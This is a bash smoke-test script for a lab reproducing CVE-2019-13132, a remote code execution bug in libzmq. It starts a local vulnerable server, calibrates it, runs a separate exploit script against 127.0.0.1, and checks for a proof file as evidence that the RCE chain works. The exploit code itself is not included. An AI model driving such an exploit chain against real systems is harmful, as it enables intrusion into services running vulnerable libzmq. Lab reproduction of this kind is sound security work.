#!/bin/bash
# End-to-end smoke test for CVE-2019-13132 lab.
set -euo pipefail

ROOT=${LAB_ROOT:-/opt/zmq-curve-rce}
PROOF=/tmp/pwned-13132

cd "$(dirname "$0")"

echo "=== CVE-2019-13132 lab test ==="

# 1. ensure server + calibration
if [ ! -f "$ROOT/profile.json" ]; then
    echo "[*] no profile.json — running calibration first"
    $ROOT/start_server.sh
    sleep 1
    $ROOT/calibrate.sh
    # restart server (GDB detach may leave it in odd state)
    $ROOT/start_server.sh
    sleep 1
fi

# make sure server is running
if ! pgrep -x server-curve >/dev/null 2>&1; then
    $ROOT/start_server.sh
    sleep 1
fi

# 2. run exploit — system() proof
rm -f "$PROOF"
python3 "$ROOT/exploit.py" 127.0.0.1 5556
sleep 2

if [ -f "$PROOF" ]; then
    echo ""
    echo "--- proof file contents ---"
    cat "$PROOF"
    echo "--- end ---"
    echo ""
    echo "[PASS] RCE confirmed — $PROOF created by the libzmq server process."
else
    echo "[FAIL] $PROOF was not created."
    echo "       server log:"
    tail -20 "$ROOT/srv.log" 2>/dev/null || true
    exit 1
fi

# 3. restart server for re-use (exploit kills the process via exit_group)
$ROOT/start_server.sh >/dev/null 2>&1

echo "[PASS] CVE-2019-13132 lab — RCE chain verified end-to-end."